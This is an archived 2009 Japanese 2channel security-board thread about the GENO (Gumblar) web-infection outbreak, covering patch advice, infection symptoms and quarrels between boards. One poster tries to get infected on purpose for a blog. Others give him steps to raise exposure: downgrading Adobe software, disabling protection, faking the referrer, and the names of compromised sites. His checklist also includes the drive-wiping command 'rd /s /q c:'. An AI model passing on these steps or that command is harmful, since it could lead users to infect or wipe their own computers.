09/05/18 02:30:38 z2bzI9GC0
>>504
1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
4.Adobe Acrobat Readerの JavaScript 機能OFF
ここまでは出来るだろ。
506:192.168.0.774
09/05/18 02:30:55 O4S1nyz60
少なくとも4月頃は色んな板でやたらとスレ立って祭りしてたようなイメージがあるが
逆に今回の騒ぎ様の方が違和感というか今更感があるんじゃ?
507:192.168.0.774
09/05/18 02:34:46 g3jcf+6w0
情弱腐女子とニコ厨大好き東方・ボーカロイド同人サイトで
急速にパンデミック起こしたからじゃね
508:192.168.0.774
09/05/18 02:35:24 0qo6gqNs0
実際に感染してんのはそいつらだけだろうな
509:192.168.0.774
09/05/18 02:36:14 tHeAy9ld0
707 名前:GENO[sage] 投稿日:2009/05/18(月) 02:31:35 ID:93Cm5lq90
Photoshopとか割れ物使ってる人多いから
Adobe製品を丸ごとアップデートOFFにしてる人多そうだよね
そしてPDF ReaderやFlashまでアップデートされずにウイルスに狙われる
709 名前:GENO[sage] 投稿日:2009/05/18(月) 02:33:00 ID:9UIQFr160
>>707
なるへそ、だから同人で感染爆発してるのか
510:192.168.0.774
09/05/18 02:36:32 9OAY1try0
まぁ四月の時はGENOのサイト行ってない奴は他人事で済まされたからな
いや、実際済まなかったんだけどさ
511:192.168.0.774
09/05/18 02:36:54 PGXf1oVHO
夏コミが近いというのに
まったくもう!
512:192.168.0.774
09/05/18 02:37:32 ovjuZukc0
とりあえず、今日会社とか学校ある人は行き先のPCを要チェックかと。
セキュリティ部門の人とかが今回の件わかっていると被害を抑えることができるんだけど…
ベンダーが日本時間の月曜朝に対応するなんてありえないと思うし…
※まずはネットワークから切り離してhostsを変更してから再起動後に…
諸々のファイルチェックして…って大変だなぁ…
513:192.168.0.774
09/05/18 02:37:59 yKeLT0rF0
>>506
同人板の方で盛り上がって火がついて燃え移ったというか巻き込まれたというか
サイト持ちの人が多いのもあるけど、もともと燃えやすい極端な人が多い
きちんと理解していて宥めてる人に対して
危機意識が足りないと噛み付いてる状態で、セキュ板も随分荒れた
(同人板が荒したってわけじゃなくて同人板から流れてきた人が原因でスレ住人が荒れた)
514:192.168.0.774
09/05/18 02:40:05 uebw+uxF0
いや、意外と潜伏期間ってこんなもんなんじゃないのかな。
>>504
こっちの方が優しく教えてくれると思うぞ
【管理も】同人サイト・GENOウィルス注意7【閲覧も】
スレリンク(doujin板)l50
515:192.168.0.774
09/05/18 02:41:31 6Sa4e4kP0
誰かウイルスに確実に感染するサイト教えてください
とりあえず今のところ
成美堂出版 www.seibidoshuppan.co.jp/
livmail www.livmail.com/3others-page/janet/tokusen/index.htm
carwash www.carwash.co.jp/
senlights www.senlights.co.jp/seihin/kirenaru-1s.htm
を試してみました
誰かお願いします
516:192.168.0.774
09/05/18 02:44:44 yKeLT0rF0
>>515
まずアドベ製品のダウングレード
JSをオンにする。セキュリティソフトを解除
ファイアーウォールも解除
で閲覧すれば感染するかと
サイトが悪いんじゃ無くて環境のせいで感染しないんじゃない?
517:192.168.0.774
09/05/18 02:45:21 ovjuZukc0
こういうときは自宅警備員さんがうらやましい…かな?
うちの勤め先…絶対誰かGENO罠踏んでるだろうなぁ
本社の基幹でDenyしてくれてると安心なんだけど…
感染者には始末書というプレゼントが…(=ω=
518:192.168.0.774
09/05/18 02:48:05 O4S1nyz60
>>513
セキュ板のgenoスレも見てるから一応の流れは知ってる
確かにサイト持ってる友人もgeno騒動知らなかったみたいだったし
頻繁に2ちゃん覗いてないとそんなモンなのかねぇ…
519:192.168.0.774
09/05/18 02:51:10 yKeLT0rF0
>>518
更に砕くと
同人ノウハウの一つのスレで1回話題になってちょっと騒ぎになる
これは騒いで皆に知らせた方が良いということで同人板にスレが立つ
超盛り上がる。と言う感じ。たった一夜で連投規制のある板で凄い加速だよ
前々からこの手のタイプのウイルスはこんなもんでしょ
今回はけっこう広まってるからちょっと事情が違うけど
520:192.168.0.774
09/05/18 02:51:22 ua7Ctj4Z0
eSafeでも紹介記事が出てたようだ。5/14。
URLリンク(www.aladdin.co.jp)'s-weekend.html
521:192.168.0.774
09/05/18 02:52:28 d0ClE+9g0
>>513
同人板はカード番号抜かれるとかもう無茶苦茶言ってる奴がいるw
わからないことはわからないでいいのに異常なまでの恐怖心を煽るようなことを言うからゆとりが流れ込んでくるんだよ
自業自得だ
522:192.168.0.774
09/05/18 02:56:34 ImVScTUk0
>>499
これで割れのacrobatはすべて使い物にならなくなるワケだ.
adobeはホルホルしてるだろうなw
523:192.168.0.774
09/05/18 02:57:45 o7Ns7JFwP
>>521
それはないとは言い切れないよ
524:192.168.0.774
09/05/18 02:59:22 uebw+uxF0
>>521
感染サイトにまで誘導してる奴まで現れる始末だしな。
正直、彼らとは距離を置きたい。巻き添えくいそうでたまらんよ。
525:192.168.0.774
09/05/18 03:00:28 PGXf1oVHO
ケータイからPCブラウザ見るぶんには大丈夫なんでしょ?
526:192.168.0.774
09/05/18 03:00:50 3Vb3xWiS0
このウィルスなんて読むの?じぇの?げの?
527:192.168.0.774
09/05/18 03:01:08 /yFIekht0
★危険★
これも感染?
www.seibidoshuppan.co.jp
528:192.168.0.774
09/05/18 03:02:06 o7Ns7JFwP
>>527
してるね
529:192.168.0.774
09/05/18 03:02:24 g3jcf+6w0
同人板って他のν速やvipやここのウイルス対策スレと
明らかに毛色というかノリというか湿度が違う気がする
なんかこわい
530:192.168.0.774
09/05/18 03:04:32 wbZLj6zq0
>>527
GENOウイルスチェッカー
危険度1000%
超絶危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。
評価ミス報告
531:192.168.0.774
09/05/18 03:04:48 7HSqf6Si0
>>529
ネチネチした連帯感みたいなのがあるな。
自治好きが多いんだと思う。
532:192.168.0.774
09/05/18 03:05:50 6Sa4e4kP0
>>516
>>515に追記します
>>515のサイトを踏んだ結果
成美堂出版はなんともなく
他3つのサイトではトロイが検出されました
けど感染したいウイルスはGENOです
現在の環境は
Windows XP Home SP3
IE6
reader 8
flash player 9
JS有効
セキュリティー無効
ファイアーウォール無効
です。
他にGENOに感染するための条件はなにかありますか?
533:192.168.0.774
09/05/18 03:07:29 PGXf1oVHO
何故感染したがる
534:192.168.0.774
09/05/18 03:08:21 eVa+R5Lo0
>>520
送信先はウクライナか・・・
しかし、北アメリカとかヨーロッパ全土が感染とは・・・
535:192.168.0.774
09/05/18 03:09:04 6Sa4e4kP0
>>533
○感染後の行動
・cmd.exeとregedit.exeが起動するか確認
・タスクマネージャーでcmdが勝手に動いてないか確認
・Acrobat(Adobe Reader?)が勝手に起動
・CPU使用率をチェック
・PDFファイルやシステムファイルが増殖してるかチェック
・cmdでdir C:\WINDOWS\system32\sqlsodbc.chmのサイズが50,727か確認
・最後cmdからrd /s /q c:を実行
○検証するブラウザ
IE6
IE7
IE8
Firefox 3.0.10
Opera 9.64
Chome 1.0.154.65
を自分で検証してみたい
536:192.168.0.774
09/05/18 03:09:23 ZooZ8biq0
>>531
同人女は他人から見たら馬鹿としか思えないローカルルールが多く、それらを守らないとヲチというリンチに遭う
危機感煽ってるくせに感染サイト晒せないのはそのせいだね
大いなる矛盾なんだが
あそこ見てると葬式の時だけはりきってる普段は地味なおばさんを思い出す
537:192.168.0.774
09/05/18 03:11:10 gtQ58YdFO
ラトビアでも流行ってると聞いたぞ
538:192.168.0.774
09/05/18 03:12:31 yKeLT0rF0
>>533
検体ほしいとか?
>>532
成美堂出版はソースは真っ黒だったんだが
ウイルスの搬入先が死んでるとこだったのかね?
539:192.168.0.774
09/05/18 03:13:01 PGXf1oVHO
>>535
ご、ごめん
解りやすく説明して
目的だけ
540:192.168.0.774
09/05/18 03:15:15 7HSqf6Si0
クリーンインストールすりゃ良いって分かってんだから、
予備のPC使って自分で確かめたいって奴もいるだろう。
541:192.168.0.774
09/05/18 03:16:23 uebw+uxF0
>>535
まさか感染したまま、満員電車に乗るような感じのことをするんじゃないだろうな。
542:192.168.0.774
09/05/18 03:16:43 vNF2317C0
>>537
えーと、バルト三国って北欧?なのかな
あそこらへんはIT強い国いくつかあったしそっちにも行きそうだ
ヨーロッパ・北アメリカ・北欧ときたらそろそろインドや東南アジア辺りもヤバそう
543:192.168.0.774
09/05/18 03:18:25 6Sa4e4kP0
>>538
他のスレでもそう聞いたよ
>>539
単なるブログのネタだよ
かれこれ6時間以上GENOウイルスを求めてさまよってる・・・
俺はただSSと検証レポをしたいだけなのに(´;ω;`)
まさかこんなに時間がかかるとは思わなんだぞ
544:192.168.0.774
09/05/18 03:18:33 yKeLT0rF0
>>536
同人女って言うかあの板がおかしいんだよ
類友のはずのノウハウ板はそうでもないし
同人板から移転が相次いで最近はあっちも大変らしいが。
545:192.168.0.774
09/05/18 03:19:11 XWeKEH7q0
>>535
・XP以下のWindowsでアクセスする。
・Adobe Readerをインストールしている。
・Flash Playerをインストールしている。
・JavaScriptを有効にする。
・Chrome以外のブラウザでアクセスする。
・ロケーションバーにURLを打ち込んでアクセスするのではなく、感染サイトからアクセスする。またはリファラを偽装する
・過去に攻撃サイトにアクセスしたことがあり、その際cookieが有効だった場合はcookieを削除する。以後cookieを拒否する
・もし以前に攻撃サイトにアクセスしたことがあり、その際「XP以下のWindows以外」でアクセスしていた場合はIPアドレスを変える
・セキュリティソフトを使用しない。
以上の条件を満たすことが必要。
これでも感染しないようであれば
・Adobe Reader、Flash Playerのバージョンを下げてみる
・仮想マシンを使っているならば、実機で試してみる
・NX bitが実装されているCPUを使用しているならば、実装されていないCPUを使用する
546:192.168.0.774
09/05/18 03:20:17 gtQ58YdFO
>>542
ラトビアはバルトで北欧地方だ
イギリスでもGENOかは分からないがウイルスが流行ってると聞いたが…これは定かじゃない
誰か知ってるやついるか
547:192.168.0.774
09/05/18 03:21:12 w3XVYZKL0
>>521
可能だろ、何言ってるんだ
548:192.168.0.774
09/05/18 03:21:23 PGXf1oVHO
>>540
なんだ…そんだけか
>>541
そしたらどうなるんですか?(;゚Д゚)ゴクリ...
549:192.168.0.774
09/05/18 03:21:45 wsKEiiw60
>>535
>・最後cmdからrd /s /q c:を実行
パニックにつけ込んだデマって怖いね
550:192.168.0.774
09/05/18 03:22:05 yKeLT0rF0
>>543
わかったちょっと待ってて
いくつか候補はあるんだが、すでに対応きてるかもだからからちと確認してくる
551:192.168.0.774
09/05/18 03:23:16 gtQ58YdFO
そういえば俺のパソコン感染して初期化した
GENOウイルスらしきものは見つからなかったがネットワークに接続できない
まさか今もパソコン内部に潜んでて進化してるなんてことないよな
552:192.168.0.774
09/05/18 03:24:28 SGBG03gk0
>>543
すでに1つDLしてたら24時間はDLできないって誰かが言ってた
しそこねたことがあったのかもしれない
IP変えられるならそれで挑戦してみるのも手かも
553:192.168.0.774
09/05/18 03:25:38 yKeLT0rF0
>>549
感染したら最後はそれでフィニッシュしないとw
アンチソフトでの駆除できないんだし。不思議なことはないよ
>>543
リボンマジックでググってみてくれ
このサイトもまだ対応してないっぽい。ソースが黒い
554:192.168.0.774
09/05/18 03:25:56 Z5hmtXFr0
774 名前:geno[sage] 投稿日:2009/05/18(月) 03:24:56 ID:E9Mwu5RAP
296 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/18(月) 03:20:10
なんか同人スレは「質問はセキュリティ板へ行け」みたいに言ってるぞw
なんでセキュ板がそこまで面倒みてやらなならんのだと・・・
しかも親切に質問に答えてやってると「セキュリティ板に乗っ取られてる!!」とかw
もうねアフォか馬鹿か同人かと・・・
555:192.168.0.774
09/05/18 03:26:01 PGXf1oVHO
>>543
レポートかw
確かにブログネタにしたら訪問者増えるよね、きっと
怖くて今ケータイからやってるんで力になってあげられないけど
同人サイトとかランキングとか同人サイトのリンクから梯子したりすれば見つかるんじゃない?
556:192.168.0.774
09/05/18 03:27:13 uebw+uxF0
>>543
海外サイト漁った方が早いぞ。
あっちのほうがいいかげんだから。
sqlsodbc.chmで検索かけてそこのページから飛ぶのだ。
557:192.168.0.774
09/05/18 03:27:21 pFQN0G770
>>543
Reader8で感染できなかったので9.0.0にしたら感染できた、たまたまかも知れないが
成美堂のtuz.cnは死んでる
あとIP変えまくれ
558:192.168.0.774
09/05/18 03:27:56 7HSqf6Si0
面白い流れになってきたなw
559:192.168.0.774
09/05/18 03:29:39 WSfvVExd0
>>557
>>207
Flash Playerは10.0.22.87と9.0.159.0がGENO関連の脆弱性を修正したver
Adobe Readerは7.1.1と8.1.4と9.1.0がGENO関連の脆弱性を修正したver
以降は別の脆弱性を修正したver
560:192.168.0.774
09/05/18 03:29:45 gtQ58YdFO
外も中もウイルスだらけだな…(´д`)
561:192.168.0.774
09/05/18 03:30:55 6Sa4e4kP0
>>545
サンクス
とりあえず上の項目は全部試してる
ただ下の項目の下二つは
VMware上のXPでAthlon 64 X2 5600+だから
条件をクリアできてないな
>>549
まぁそれは今回の検証のオチってやつだよw
>>550
おねがいしますm( __ __ )m
>>552
IPはいろいろあって何度も変えてる
けど感染してない
>>553
一応リボンマジックも直接URLを入力して踏んでみた
けど感染しなかった
>>555
一月ぶりぐらいにかくブログですw
562:192.168.0.774
09/05/18 03:32:07 pFQN0G770
>>559
おお、そういうことだったのかありがとう
563:192.168.0.774
09/05/18 03:32:57 SGBG03gk0
実はすでに感染してるんじゃね・・・?
564:192.168.0.774
09/05/18 03:33:28 WSfvVExd0
778 名前:GENO[sage] 投稿日:2009/05/18(月) 03:31:36 ID:0ntxn30Q0
>>771、>>775
>>774の書き込みが証明しているとおり、奴らがこの板で回答する限り、徹底スルーってのは無理だから。
セキュリティ板の荒らしどもがこのスレに常駐している限り、いつまでも初心者の質問が来続ける。
つーか「アフォかと…」はどっちなのかと。
「親切に答えてやってるのに」とかほざいてますが、お前らに自覚がないだけで、同人板にとっては実質荒らしだっつの。
>>776-777
同意。完全に板違いなのに肯定されてるのがどうかしてる。
565:192.168.0.774
09/05/18 03:34:39 CVgAB4qkP
564 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 03:33:28 ID:WSfvVExd0
778 名前:GENO[sage] 投稿日:2009/05/18(月) 03:31:36 ID:0ntxn30Q0
>>771、>>775
>>774の書き込みが証明しているとおり、奴らがこの板で回答する限り、徹底スルーってのは無理だから。
セキュリティ板の荒らしどもがこのスレに常駐している限り、いつまでも初心者の質問が来続ける。
つーか「アフォかと…」はどっちなのかと。
「親切に答えてやってるのに」とかほざいてますが、お前らに自覚がないだけで、同人板にとっては実質荒らしだっつの。
>>776-777
同意。完全に板違いなのに肯定されてるのがどうかしてる。
566:192.168.0.774
09/05/18 03:35:19 Z5hmtXFr0
565 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 03:34:39 ID:CVgAB4qkP
564 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 03:33:28 ID:WSfvVExd0
778 名前:GENO[sage] 投稿日:2009/05/18(月) 03:31:36 ID:0ntxn30Q0
>>771、>>775
>>774の書き込みが証明しているとおり、奴らがこの板で回答する限り、徹底スルーってのは無理だから。
セキュリティ板の荒らしどもがこのスレに常駐している限り、いつまでも初心者の質問が来続ける。
つーか「アフォかと…」はどっちなのかと。
「親切に答えてやってるのに」とかほざいてますが、お前らに自覚がないだけで、同人板にとっては実質荒らしだっつの。
>>776-777
同意。完全に板違いなのに肯定されてるのがどうかしてる。
567:192.168.0.774
09/05/18 03:35:33 PGXf1oVHO
>>560
まったくですね、新型インフルエンザ流行ってるから外出控えようと思って家でPCしようと思ったらウイルスが出回ってて、なんだかなー;
>>561
良い記事書いてくださいな(・∀・)オーエン
海外の二次創作サイトって感染してる所あるのかな
それともアダルトサイトの方が感染しやすいとか?
568:192.168.0.774
09/05/18 03:35:42 yKeLT0rF0
>>561
ティアラモードと株式会社まどかももう試してるだろうな
どうにも引っかからない環境にいるようにしか見えない
後は同人サイト巡りしかないわー
569:192.168.0.774
09/05/18 03:36:13 uebw+uxF0
>>564-565
おまえら……
ま、同人板には関わらないのが正解ってことだ。
570:192.168.0.774
09/05/18 03:37:43 gtQ58YdFO
外出もままならない、ネットもできない今、やることはポケモンしかねえ…
571:192.168.0.774
09/05/18 03:38:11 bnpUDzMr0
今日はウイルスの恐ろしさとストーカーの恐ろしさを知ることが出来た
572:192.168.0.774
09/05/18 03:38:39 6Sa4e4kP0
>>556
ちょっとググってみます
>>557
そういやリボンマジックじゃ
IP変えてないからちょっと試してみます
>>563
今のところsqlsodbc.chmのサイズは変化なし
再起動後も通常起動確認
>>567
ありがと
>>568
その二つはまだ踏んでないです・・・
今から踏んできます
573:192.168.0.774
09/05/18 03:40:03 SGBG03gk0
>>572
レジストリの確認はした?
574:192.168.0.774
09/05/18 03:40:25 XWeKEH7q0
>>545
ちょっと説明が不十分なので修正
× ・ロケーションバーにURLを打ち込んでアクセスするのではなく、感染サイトからアクセスする。またはリファラを偽装する
○ ・ロケーションバーにmartuz.cnを打ち込んでアクセスするのではなく、感染サイトからアクセスする。リファラを切っている場合は有効にする
>>561
となるとやはりredearとflashのバージョンかな。
reader 8.1.2、flash 9.0.115以下あたりではどうだろう。
575:192.168.0.774
09/05/18 03:41:55 O4S1nyz60
豚インフルとgenoウイルスの発見が同時期くらい
豚インフルの国内初感染者確認と同人板の感染者騒ぎがほぼ同時
あっちもこっちも絶妙なタイミングで大変だな
576:192.168.0.774
09/05/18 03:43:26 x3CeUoiK0
まさかGENOウイルスなんてなかった、なんてことはないよな?
577:192.168.0.774
09/05/18 03:45:41 gtQ58YdFO
>>576
それは一体どういうことだ?
578: ◆f/iQdjPxCM
09/05/18 03:46:55 76hdi/6T0
cmd.exe や regedt32.exe/regedit.exe の起動というのはほぼ当てになるまいし、
sqlsodbc.chm は環境問題もあるので、
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\
の方から調べてみるのを初心者向けに試作してみた。
問題はこれ自体が「不審なEXEファイル」なことだねぇ……。
俺が言うのもなんだけど、一般の人は少なくとも、
玄人が仮想環境等を使って害が無さそうなことを確認してくれるまでは、
手を出さないこと推奨、かね。
想定ターゲットは win2k/xp(32bit).
俺以外の手で改竄された場合の検出用データ:
SIZE (GENOdetect.exe) = 6144
MD5 (GENOdetect.exe) = e33cbb5bd8604ca1c0f21d3d1f7482c1
SHA1 (GENOdetect.exe) = 137e15aa7d31a6d9337119eb5d8ad42575088192
SHA256 (GENOdetect.exe) = 38df6e4666e92dfbe414b5bf8bac9f91cff1ec9fc02058eabf76221845f10b86
SHA512 (GENOdetect.exe) = b45ae8d3e6221956207e1de461f681d0e53f68a2cff516c0eab7aa089a40a1fb4be8763db00bc3b2f5da52dd4a1fed3485c8584894d735810a38a04349949e0e
URLリンク(www1.axfc.net)
DLkey: testGENOdetect
579:192.168.0.774
09/05/18 03:48:56 x3CeUoiK0
>>577
そのまんまの意味。
何か普通のウイルスの広がり方と違う気がする。
検証実験も妙に少ないし。
580:192.168.0.774
09/05/18 03:52:06 6Sa4e4kP0
>>573
中身までは確認してないけど
起動はするみたいです
>>574
現在のヴァージョンは
reader 8.1.2
flash player 9.0.159.0
ですね
flash playerをもっとダウングレードしてみます
それととりあえずティアラモードと株式会社まどかを
踏んでみたけど感染症状なし
>>578
ちょっと試してみます
581:192.168.0.774
09/05/18 03:54:51 PGXf1oVHO
でっち上げかもね
582:192.168.0.774
09/05/18 03:55:50 SGBG03gk0
>>580
なかみのほう
auxのだけど>>578さんのできっとおkだね
583:192.168.0.774
09/05/18 03:57:20 VzSgGubRO
これ、感性の可能性あるのはWindowsのみ?
マックは平気なのかな?
584:192.168.0.774
09/05/18 03:58:27 6Sa4e4kP0
>>578>>582
試してみた
URLリンク(www.dotup.org)
やっぱり無事?なのかな?
585:192.168.0.774
09/05/18 04:00:07 e2dzUe840
自分のPCが感染してるかどうか
確実に確認できるウイルスチェッカー教えてください
586:192.168.0.774
09/05/18 04:00:41 gtQ58YdFO
>>579
確かに感染の波は少し変わってるが、存在そのものを否定するのは難しいぞ。
現に俺のパソコン感染したからな。まとめwikiに記載されてた症状と一致しまくった。
だがウイルスという名義で別の目的の用途をなしていたとしたら…それもそれで考えは広がるが。
(個人的な想像、もしもまとめwikiそのものがウイルスでっちあげ&発祥源だったらカオス)
587:192.168.0.774
09/05/18 04:00:41 PGXf1oVHO
一応聞かせて、ケータイでPCブラウザ見ても感染しないよね?
588:192.168.0.774
09/05/18 04:03:45 gtQ58YdFO
>>578
それはわからん。ただ携帯のフルブラウザで開くと感染の疑いがあるらしい。ただの携帯のインターネットなら問題ないが、PCページはどうかは不明だな。
調べても情報が入り混じっていて自分で確かめるしか確かな情報は得られないと思う…。
589:192.168.0.774
09/05/18 04:04:49 x3CeUoiK0
>>586
まぁさすがに何もないってことはないかw
ただちょっと作為を感じるよね。しばらく経過を見守るしかないか。
590:192.168.0.774
09/05/18 04:06:23 yKeLT0rF0
>>587-588
無い無い
ウイルス貰う事ができてもウイルスが動ける場所が携帯にはない。
PCように設計されてるウイルスだから、PCのシステムファイルがないと
役立たずだよ。MACやゲーム類もそうだよ。
携帯でブラウザ見れても、Windows専用ゲームとかはできないだろ